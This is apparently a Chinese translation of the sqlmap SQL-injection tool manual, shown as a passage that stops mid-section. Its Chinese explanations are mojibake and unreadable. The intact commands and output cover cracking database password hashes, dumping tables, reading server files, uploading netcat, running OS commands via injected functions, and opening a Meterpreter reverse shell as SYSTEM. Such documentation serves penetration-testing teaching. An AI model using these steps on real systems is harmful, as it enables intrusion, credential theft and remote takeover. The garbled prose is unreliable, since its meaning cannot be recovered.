$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1

[...]

back-end DBMS: PostgreSQL

[hh:mm:38] [INFO] fetching database users password hashes

do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y

[hh:mm:42] [INFO] using hash method: 'postgres_passwd'

what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]

[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'

do you want to use common password suffixes? (slow!) [y/N] n

[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)

[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'

[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'

database management system users password hashes:

[*] postgres [1]:

password hash: md5d7d880f96044b72d0bba108ace96d1e4

clear-text password: testpass

[*] testuser [1]:

password hash: md599e5ea7a6f7c3269995cba3927fd0093

clear-text password: testpass

鍙互鐪嬪埌sqlmap涓嶄粎鍕掑嚭鏁版嵁搴撶殑鐢ㄦ埛璺熷瘑鐮侊紝鍚屾椂涔熻瘑鍒嚭鏄疨ostgreSQL鏁版嵁搴擄紝骞惰闂敤鎴锋槸鍚﹂噰鐢ㄥ瓧鍏哥垎鐮寸殑鏂瑰紡杩涜鐮磋В锛岃繖涓垎鐮村凡缁忔敮鎸丱racle鍜孧icrosoft SQL Server銆�

涔熷彲浠ユ彁渚�-U鍙傛暟鏉ユ寚瀹氱垎鐮村摢涓敤鎴风殑hash銆�

鍒楀嚭鏁版嵁搴撶鐞嗗憳鏉冮檺

鍙傛暟锛�--privileges

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夌敤鎴风殑琛ㄧ殑鏉冮檺鏃讹紝寰堝彲鑳藉垪涓惧嚭姣忎釜鐢ㄦ埛鐨勬潈闄愶紝sqlmap灏嗕細鍛婅瘔浣犲摢涓槸鏁版嵁搴撶殑瓒呯骇绠＄悊鍛樸�備篃鍙互鐢�-U鍙傛暟鎸囧畾浣犳兂鐪嬪摢涓敤鎴风殑鏉冮檺銆�

鍒楀嚭鏁版嵁搴撶鐞嗗憳瑙掕壊

鍙傛暟锛�--roles

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夌敤鎴风殑琛ㄧ殑鏉冮檺鏃讹紝寰堝彲鑳藉垪涓惧嚭姣忎釜鐢ㄦ埛鐨勮鑹诧紝涔熷彲浠ョ敤-U鍙傛暟鎸囧畾浣犳兂鐪嬪摢涓敤鎴风殑瑙掕壊銆�

浠呴�傜敤浜庡綋鍓嶆暟鎹簱鏄疧racle鐨勬椂鍊欍��

鍒楀嚭鏁版嵁搴撶郴缁熺殑鏁版嵁搴�

鍙傛暟锛�--dbs

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱鍒楄〃淇℃伅鐨勮〃涓殑鏃跺�欙紝鍗冲彲鍒楀嚭鎵�鏈夌殑鏁版嵁搴撱��

鍒椾妇鏁版嵁搴撹〃

鍙傛暟锛�--tables,--exclude-sysdbs,-D

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱琛ㄤ俊鎭殑琛ㄤ腑鐨勬椂鍊欙紝鍗冲彲鍒楀嚭涓�涓壒瀹氭暟鎹殑鎵�鏈夎〃銆�

濡傛灉浣犱笉鎻愪緵-D鍙傛暟鏉ュ垪鎸囧畾鐨勪竴涓暟鎹殑鏃跺�欙紝sqlmap浼氬垪鍑烘暟鎹簱鎵�鏈夊簱鐨勬墍鏈夎〃銆�

--exclude-sysdbs鍙傛暟鏄寚鍖呭惈浜嗘墍鏈夌殑绯荤粺鏁版嵁搴撱��

闇�瑕佹敞鎰忕殑鏄湪Oracle涓綘闇�瑕佹彁渚涚殑鏄疶ABLESPACE_NAME鑰屼笉鏄暟鎹簱鍚嶇О銆�

鍒椾妇鏁版嵁搴撹〃涓殑瀛楁

鍙傛暟锛�--columns,-C,-T,-D

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱琛ㄤ俊鎭殑琛ㄤ腑鐨勬椂鍊欙紝鍗冲彲鍒楀嚭鎸囧畾鏁版嵁搴撹〃涓殑瀛楁锛屽悓鏃朵篃浼氬垪鍑哄瓧娈电殑鏁版嵁绫诲瀷銆�

濡傛灉娌℃湁浣跨敤-D鍙傛暟鎸囧畾鏁版嵁搴撴椂锛岄粯璁や細浣跨敤褰撳墠鏁版嵁搴撱��

鍒椾妇涓�涓猄QLite鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name

[...]

Database: SQLite_masterdb

Table: users

[3 columns]

+---------+---------+

| Column聽 | Type聽聽聽 |

+---------+---------+

| id聽聽聽聽聽 | INTEGER |

| name聽聽聽 | TEXT聽聽聽 |

| surname | TEXT聽聽聽 |

+---------+---------+

鍒椾妇鏁版嵁搴撶郴缁熺殑鏋舵瀯

鍙傛暟锛�--schema,--exclude-sysdbs

鐢ㄦ埛鍙互鐢ㄦ鍙傛暟鑾峰彇鏁版嵁搴撶殑鏋舵瀯锛屽寘鍚墍鏈夌殑鏁版嵁搴擄紝琛ㄥ拰瀛楁锛屼互鍙婂悇鑷殑绫诲瀷銆�

鍔犱笂--exclude-sysdbs鍙傛暟锛屽皢涓嶄細鑾峰彇鏁版嵁搴撹嚜甯︾殑绯荤粺搴撳唴瀹广��

MySQL渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs

[...]

Database: owasp10

Table: accounts

[4 columns]

+-------------+---------+

| Column聽聽聽聽聽 | Type聽聽聽 |

+-------------+---------+

| cid聽聽聽聽聽聽聽聽 | int(11) |

| mysignature | text聽聽聽 |

| password聽聽聽 | text聽聽聽 |

| username聽聽聽 | text聽聽聽 |

+-------------+---------+

Database: owasp10

Table: blogs_table

[4 columns]

+--------------+----------+

| Column聽聽聽聽聽聽 | Type聽聽聽聽 |

+--------------+----------+

| date聽聽聽聽聽聽聽聽 | datetime |

| blogger_name | text聽聽聽聽 |

| cid聽聽聽聽聽聽聽聽聽 | int(11)聽 |

| comment聽聽聽聽聽 | text聽聽聽聽 |

+--------------+----------+

Database: owasp10

Table: hitlog

[6 columns]

+----------+----------+

| Column聽聽 | Type聽聽聽聽 |

+----------+----------+

| date聽聽聽聽 | datetime |

| browser聽 | text聽聽聽聽 |

| cid聽聽聽聽聽 | int(11)聽 |

| hostname | text聽聽聽聽 |

| ip聽聽聽聽聽聽 | text聽聽聽聽 |

| referer聽 | text聽聽聽聽 |

+----------+----------+

Database: testdb

Table: users

[3 columns]

+---------+---------------+

| Column聽 | Type聽聽聽聽聽聽聽聽聽 |

+---------+---------------+

| id聽聽聽聽聽 | int(11)聽聽聽聽聽聽 |

| name聽聽聽 | varchar(500)聽 |

| surname | varchar(1000) |

+---------+---------------+

[...]

鑾峰彇琛ㄤ腑鏁版嵁涓暟

鍙傛暟锛�--count

鏈夋椂鍊欑敤鎴峰彧鎯宠幏鍙栬〃涓殑鏁版嵁涓暟鑰屼笉鏄叿浣撶殑鍐呭锛岄偅涔堝氨鍙互浣跨敤杩欎釜鍙傛暟銆�

鍒椾妇涓�涓狹icrosoft SQL Server渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb

[...]

Database: testdb

+----------------+---------+

| Table聽聽聽聽聽聽聽聽聽 | Entries |

+----------------+---------+

| dbo.users聽聽聽聽聽 | 4聽聽聽聽聽聽 |

| dbo.users_blob | 2聽聽聽聽聽聽 |

+----------------+---------+

鑾峰彇鏁翠釜琛ㄧ殑鏁版嵁

鍙傛暟锛�--dump,-C,-T,-D,--start,--stop,--first,--last

濡傛灉褰撳墠绠＄悊鍛樻湁鏉冮檺璇诲彇鏁版嵁搴撳叾涓殑涓�涓〃鐨勮瘽锛岄偅涔堝氨鑳借幏鍙栫湡涓〃鐨勬墍鏈夊唴瀹广��

浣跨敤-D,-T鍙傛暟鎸囧畾鎯宠鑾峰彇鍝釜搴撶殑鍝釜琛紝涓嶉�傜敤-D鍙傛暟鏃讹紝榛樿浣跨敤褰撳墠搴撱��

鍒椾妇涓�涓狥irebird鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users

[...]

Database: Firebird_masterdb

Table: USERS

[4 entries]

+----+--------+------------+

| ID | NAME聽聽 | SURNAME聽聽聽 |

+----+--------+------------+

| 1聽 | luther | blisset聽聽聽 |

| 2聽 | fluffy | bunny聽聽聽聽聽 |

| 3聽 | wu聽聽聽聽 | ming聽聽聽聽聽聽 |

| 4聽 | NULL聽聽 | nameisnull |

+----+--------+------------+

鍙互鑾峰彇鎸囧畾搴撲腑鐨勬墍鏈夎〃鐨勫唴瀹癸紝鍙敤-dump璺�-D鍙傛暟锛堜笉浣跨敤-T涓�-C鍙傛暟锛夈��

涔熷彲浠ョ敤-dump璺�-C鑾峰彇鎸囧畾鐨勫瓧娈靛唴瀹广��

sqlmap涓烘瘡涓〃鐢熸垚浜嗕竴涓狢SV鏂囦欢銆�

濡傛灉浣犲彧鎯宠幏鍙栦竴娈垫暟鎹紝鍙互浣跨敤--start鍜�--stop鍙傛暟锛屼緥濡傦紝浣犲彧鎯宠幏鍙栫涓�娈垫暟鎹彲hi浣跨敤--stop 1锛屽鏋滄兂鑾峰彇绗簩娈典笌绗笁娈垫暟鎹紝浣跨敤鍙傛暟 --start 1 --stop 3銆�

涔熷彲浠ョ敤--first涓�--last鍙傛暟锛岃幏鍙栫鍑犱釜瀛楃鍒扮鍑犱釜瀛楃鐨勫唴瀹癸紝濡傛灉浣犳兂鑾峰彇瀛楁涓湴涓変釜瀛楃鍒扮浜斾釜瀛楃鐨勫唴瀹癸紝浣跨敤--first 3 --last 5锛屽彧鍦ㄧ洸娉ㄧ殑鏃跺�欎娇鐢紝鍥犱负鍏朵粬鏂瑰紡鍙互鍑嗙‘鐨勮幏鍙栨敞鍏ュ唴瀹癸紝涓嶉渶瑕佷竴涓瓧绗︿竴涓瓧绗︾殑鐚滆В銆�

鑾峰彇鎵�鏈夋暟鎹簱琛ㄧ殑鍐呭

鍙傛暟锛�--dump-all,--exclude-sysdbs

浣跨敤--dump-all鍙傛暟鑾峰彇鎵�鏈夋暟鎹簱琛ㄧ殑鍐呭锛屽彲鍚屾椂鍔犱笂--exclude-sysdbs鍙幏鍙栫敤鎴锋暟鎹簱鐨勮〃锛岄渶瑕佹敞鎰忓湪Microsoft SQL Server涓璵aster鏁版嵁搴撴病鏈夎�冭檻鎴愪负涓�涓郴缁熸暟鎹簱锛屽洜涓烘湁鐨勭鐞嗗憳浼氭妸浠栧綋鍒濈敤鎴锋暟鎹簱涓�鏍锋潵浣跨敤瀹冦��

鎼滅储瀛楁锛岃〃锛屾暟鎹簱

鍙傛暟锛�--search,-C,-T,-D

--search鍙互鐢ㄦ潵瀵绘壘鐗瑰畾鐨勬暟鎹簱鍚嶏紝鎵�鏈夋暟鎹簱涓殑鐗瑰畾琛ㄥ悕锛屾墍鏈夋暟鎹簱琛ㄤ腑鐨勭壒瀹氬瓧娈点��

鍙互鍦ㄤ竴涓嬩笁绉嶆儏鍐典笅浣跨敤锛�

-C鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勫垪鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱琛ㄤ腑鎼滅储鎸囧畾鐨勫垪鍚嶃��

-T鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勮〃鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱涓悳绱㈡寚瀹氱殑琛ㄥ悕

-D鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勫簱鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱涓悳绱㈡寚瀹氱殑搴撳悕銆�

杩愯鑷畾涔夌殑SQL璇彞

鍙傛暟锛�--sql-query,--sql-shell

sqlmap浼氳嚜鍔ㄦ娴嬬‘瀹氫娇鐢ㄥ摢绉峉QL娉ㄥ叆鎶�鏈紝濡備綍鎻掑叆妫�绱㈣鍙ャ��

濡傛灉鏄疭ELECT鏌ヨ璇彞锛宻qlap灏嗕細杈撳嚭缁撴灉銆傚鏋滄槸閫氳繃SQL娉ㄥ叆鎵ц鍏朵粬璇彞锛岄渶瑕佹祴璇曟槸鍚︽敮鎸佸璇彞鎵цSQL璇彞銆�

鍒椾妇涓�涓狹ircrosoft SQL Server 2000鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1

[...]

[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''

[hh:mm:14] [INFO] retrieved: foo

SELECT 'foo':聽聽聽 'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2

[...]

[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''

[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into

distinct queries to be able to retrieve the output even if we are going blind

[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),

(CHAR(32)))

[hh:mm:50] [INFO] retrieved: foo

[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds

[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),

(CHAR(32)))

[hh:mm:50] [INFO] retrieved: bar

[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds

SELECT 'foo', 'bar':聽聽聽 'foo, bar'

鐖嗙牬

鏆村姏鐮磋В琛ㄥ悕

鍙傛暟锛�--common-tables

褰撲娇鐢�--tables鏃犳硶鑾峰彇鍒版暟鎹簱鐨勮〃鏃讹紝鍙互浣跨敤姝ゅ弬鏁般��

閫氬父鏄涓嬫儏鍐碉細

1銆丮ySQL鏁版嵁搴撶増鏈皬浜�5.0锛屾病鏈塱nformation_schema琛ㄣ��

2銆佹暟鎹簱鏄疢icrossoft Access锛岀郴缁熻〃MSysObjects鏄笉鍙鐨勶紙榛樿锛夈��

3銆佸綋鍓嶇敤鎴锋病鏈夋潈闄愯鍙栫郴缁熶腑淇濆瓨鏁版嵁缁撴瀯鐨勮〃鐨勬潈闄愩��

鏆村姏鐮磋В鐨勮〃鍦╰xt/common-tables.txt鏂囦欢涓紝浣犲彲浠ヨ嚜宸辨坊鍔犮��

鍒椾妇涓�涓狹ySQL 4.1鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner

[...]

[hh:mm:39] [INFO] testing MySQL

[hh:mm:39] [INFO] confirming MySQL

[hh:mm:40] [INFO] the back-end DBMS is MySQL

[hh:mm:40] [INFO] fetching banner

web server operating system: Windows

web application technology: PHP 5.3.1, Apache 2.2.14

back-end DBMS operating system: Windows

back-end DBMS: MySQL < 5.0.0

banner:聽聽聽 '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'

[hh:mm:40] [INFO] adding words used on web page to the check list

please enter number of threads? [Enter for 1 (current)] 8

[hh:mm:43] [INFO] retrieved: users

Database: testdb

[1 table]

+-------+

| users |

+-------+

鏆村姏鐮磋В鍒楀悕

鍙傛暟锛�--common-columns

涓庢毚鍔涚牬瑙ｈ〃鍚嶄竴鏍凤紝鏆村姏璺戠殑鍒楀悕鍦╰xt/common-columns.txt涓��

鐢ㄦ埛鑷畾涔夊嚱鏁版敞鍏�

鍙傛暟锛�--udf-inject,--shared-lib

浣犲彲浠ラ�氳繃缂栬瘧MySQL娉ㄥ叆浣犺嚜瀹氫箟鐨勫嚱鏁帮紙UDFs锛夋垨PostgreSQL鍦╳indows涓叡浜簱锛孌LL锛屾垨鑰匧inux/Unix涓叡浜璞★紝sqlmap灏嗕細闂綘涓�浜涢棶棰橈紝涓婁紶鍒版湇鍔″櫒鏁版嵁搴撹嚜瀹氫箟鍑芥暟锛岀劧鍚庢牴鎹綘鐨勯�夋嫨鎵ц浠栦滑锛屽綋浣犳敞鍏ュ畬鎴愬悗锛宻qlmap灏嗕細绉婚櫎瀹冧滑銆�

绯荤粺鏂囦欢鎿嶄綔

浠庢暟鎹簱鏈嶅姟鍣ㄤ腑璇诲彇鏂囦欢

鍙傛暟锛�--file-read

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓嶇敤鎴锋湁鏉冮檺浣跨敤鐗瑰畾鐨勫嚱鏁般�傝鍙栫殑鏂囦欢鍙互鏄枃鏈篃鍙互鏄簩杩涘埗鏂囦欢銆�

鍒椾妇涓�涓狹icrosoft SQL Server 2005鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \

--file-read "C:/example.exe" -v 1

[...]

[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2000

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'

[hh:mm:50] [INFO] the SQL query provided returns 3 entries

C:/example.exe file saved to:聽聽聽 '/software/sqlmap/output/192.168.136.129/files/C__example.exe'

[...]

$ ls -l output/192.168.136.129/files/C__example.exe

-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe

output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel

80386 32-bit

鎶婃枃浠朵笂浼犲埌鏁版嵁搴撴湇鍔″櫒涓�

鍙傛暟锛�--file-write,--file-dest

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓嶇敤鎴锋湁鏉冮檺浣跨敤鐗瑰畾鐨勫嚱鏁般�備笂浼犵殑鏂囦欢鍙互鏄枃鏈篃鍙互鏄簩杩涘埗鏂囦欢銆�

鍒椾妇涓�涓狹ySQL鐨勪緥瀛愶細

$ file /software/nc.exe.packed

/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed

-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \

"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]

[hh:mm:29] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or 2008

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: MySQL >= 5.0.0

[...]

do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully

written on the back-end DBMS file system? [Y/n] y

[hh:mm:52] [INFO] retrieved: 31744

[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,

same size as the local file '/software/nc.exe.packed'

杩愯浠绘剰鎿嶄綔绯荤粺鍛戒护

鍙傛暟锛�--os-cmd,--os-shell

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓嶇敤鎴锋湁鏉冮檺浣跨敤鐗瑰畾鐨勫嚱鏁般��

鍦∕ySQL銆丳ostgreSQL锛宻qlmap涓婁紶涓�涓簩杩涘埗搴擄紝鍖呭惈鐢ㄦ埛鑷畾涔夌殑鍑芥暟锛宻ys_exec()鍜宻ys_eval()銆�

閭ｄ箞浠栧垱寤虹殑杩欎袱涓嚱鏁板彲浠ユ墽琛岀郴缁熷懡浠ゃ�傚湪Microsoft SQL Server锛宻qlmap灏嗕細浣跨敤xp_cmdshell瀛樺偍杩囩▼锛屽鏋滆绂侊紙鍦∕icrosoft SQL Server 2005鍙婁互涓婄増鏈粯璁ょ鍒讹級锛宻qlmap浼氶噸鏂板惎鐢ㄥ畠锛屽鏋滀笉瀛樺湪锛屼細鑷姩鍒涘缓銆�

鍒椾妇涓�涓狿ostgreSQL鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \

--os-cmd id -v 1

[...]

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: PostgreSQL

[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system

[hh:mm:12] [INFO] the back-end DBMS operating system is Linux

[hh:mm:12] [INFO] testing if current user is DBA

[hh:mm:12] [INFO] detecting back-end DBMS version from its banner

[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist

[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist

[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file

[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file

do you want to retrieve the command standard output? [Y/n/a] y

command standard output:聽聽聽 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'

[hh:mm:19] [INFO] cleaning up the database management system

do you want to remove UDF 'sys_eval'? [Y/n] y

do you want to remove UDF 'sys_exec'? [Y/n] y

[hh:mm:23] [INFO] database management system cleanup finished

[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can

only be deleted manually

鐢�--os-shell鍙傛暟涔熷彲浠ユā鎷熶竴涓湡瀹炵殑shell锛屽彲浠ヨ緭鍏ヤ綘鎯虫墽琛岀殑鍛戒护銆�

褰撲笉鑳芥墽琛屽璇彞鐨勬椂鍊欙紙姣斿php鎴栬�卆sp鐨勫悗绔暟鎹簱涓篗ySQL鏃讹級锛屼粛鐒跺彲鑳戒娇鐢↖NTO OUTFILE鍐欒繘鍙啓鐩綍锛屾潵鍒涘缓涓�涓獁eb鍚庨棬銆傛敮鎸佺殑璇█锛�

1銆丄SP

2銆丄SP.NET

3銆丣SP

4銆丳HP

Meterpreter閰嶅悎浣跨敤

鍙傛暟锛�--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓嶇敤鎴锋湁鏉冮檺浣跨敤鐗瑰畾鐨勫嚱鏁帮紝鍙互鍦ㄦ暟鎹簱涓庢敾鍑昏�呯洿鎺ュ缓绔婽CP杩炴帴锛岃繖涓繛鎺ュ彲浠ユ槸涓�涓氦浜掑紡鍛戒护琛岀殑Meterpreter浼氳瘽锛宻qlmap鏍规嵁Metasploit鐢熸垚shellcode锛屽苟鏈夊洓绉嶆柟寮忔墽琛屽畠锛�

1銆侀�氳繃鐢ㄦ埛鑷畾涔夌殑sys_bineval()鍑芥暟鍦ㄥ唴瀛樹腑鎵цMetasplit鐨剆hellcode锛屾敮鎸丮ySQL鍜孭ostgreSQL鏁版嵁搴擄紝鍙傛暟锛�--os-pwn銆�

2銆侀�氳繃鐢ㄦ埛鑷畾涔夌殑鍑芥暟涓婁紶涓�涓嫭绔嬬殑payload鎵ц锛孧ySQL鍜孭ostgreSQL鐨剆ys_exec()鍑芥暟锛孧icrosoft SQL Server鐨剎p_cmdshell()鍑芥暟锛屽弬鏁帮細--os-pwn銆�

3銆侀�氳繃SMB鏀诲嚮(MS08-068)鏉ユ墽琛孧etasploit鐨剆hellcode锛屽綋sqlmap鑾峰彇鍒扮殑鏉冮檺瓒冲楂樼殑鏃跺�欙紙Linux/Unix鐨剈id=0锛學indows鏄疉dministrator锛夛紝--os-smbrelay銆�

4銆侀�氳繃婧㈠嚭Microsoft SQL Server 2000鍜�2005鐨剆p_replwritetovarbin瀛樺偍杩囩▼(MS09-004)锛屽湪鍐呭瓨涓墽琛孧etasploit鐨刾ayload锛屽弬鏁帮細--os-bof

鍒椾妇涓�涓狹ySQL渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]

[hh:mm:31] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: MySQL 5.0

[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system

[hh:mm:31] [INFO] the back-end DBMS operating system is Windows

how do you want to establish the tunnel?

[1] TCP: Metasploit Framework (default)

[2] ICMP: icmpsh - ICMP tunneling

>

[hh:mm:32] [INFO] testing if current user is DBA

[hh:mm:32] [INFO] fetching current user

what is the back-end database management system architecture?

[1] 32-bit (default)

[2] 64-bit

>

[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist

[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist

[hh:mm:33] [INFO] detecting back-end DBMS version from its banner

[hh:mm:33] [INFO] retrieving MySQL base directory absolute path

[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file

[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file

how do you want to execute the Metasploit shellcode on the back-end database underlying

operating system?

[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)

[2] Stand-alone payload stager (file system way)

>

[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode

which connection type do you want to use?

[1] Reverse TCP: Connect back from the database host to this machine (default)

[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports

between the specified and 65535

[3] Bind TCP: Listen on the database host for a connection

>

which is the local address? [192.168.136.1]

which local port number do you want to use? [60641]

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

>

[hh:mm:40] [INFO] creation in progress ... done

[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

_

| |聽聽聽聽聽 o

_聽 _聽 _聽聽聽 _ _|_聽 __,聽聽 ,聽聽聽 _聽 | |聽 __聽聽聽 _|_

/ |/ |/ |聽 |/聽 |聽 /聽 |聽 / \_|/ \_|/聽 /聽 \_|聽 |

|聽 |聽 |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

/|

\|

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]

+ -- --=[ 674 exploits - 351 auxiliary

+ -- --=[ 217 payloads - 27 encoders - 8 nops

=[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 60641

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:60641

[*] Starting the payload handler...

[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',

please wait..

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11

hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.

meterpreter > Loading extension incognito...success.

meterpreter > [-] The 'priv' extension has already been loaded.

meterpreter > Loading extension sniffer...success.

meterpreter > System Language : en_US

OS聽聽聽聽聽聽聽聽聽聽聽聽聽 : Windows .NET Server (Build 3790, Service Pack 2).

Computer聽聽聽聽聽聽聽 : W2K3R2

Architecture聽聽聽 : x86

Meterpreter聽聽聽聽 : x86/win32

meterpreter > Server username: NT AUTHORITY\SYSTEM

meterpreter > ipconfig

MS TCP Loopback interface

Hardware MAC: 00:00:00:00:00:00

IP Address聽 : 127.0.0.1

Netmask聽聽聽聽 : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection

Hardware MAC: 00:0c:29:fc:79:39

IP Address聽 : 192.168.136.129

Netmask聽聽聽聽 : 255.255.255.0

meterpreter > exit

[*] Meterpreter session 1 closed.聽 Reason: User exit

榛樿鎯呭喌涓婱ySQL鍦╓indows涓婁互SYSTEM鏉冮檺杩愯锛孭ostgreSQL鍦╓indows涓嶭inux涓槸浣庢潈闄愯繍琛岋紝Microsoft SQL Server 2000榛樿鏄互SYSTEM鏉冮檺杩愯锛孧icrosoft SQL Server 2005涓�2008澶ч儴鍒嗘槸浠ETWORK SERVICE鏈夋椂鏄疞OCAL SERVICE銆�

瀵筗indows娉ㄥ唽琛ㄦ搷浣�

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓峸eb搴旂敤鏀寔鍫嗘煡璇€�� 褰撶劧锛屽綋鍓嶈繛鎺ユ暟鎹簱鐨勭敤鎴蜂篃闇�瑕佹湁鏉冮檺鎿嶄綔娉ㄥ唽琛ㄣ��

璇诲彇娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-read

鍐欏叆娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-add

鍒犻櫎娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-del

娉ㄥ唽琛ㄨ緟鍔╅�夐」

鍙傛暟锛�--reg-key锛�--reg-value锛�--reg-data锛�--reg-type

闇�瑕侀厤鍚堜箣鍓嶄笁涓弬鏁颁娇鐢紝渚嬪瓙锛�

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

甯歌鍙傛暟

浠巗qlite涓鍙杝ession

鍙傛暟锛�-s

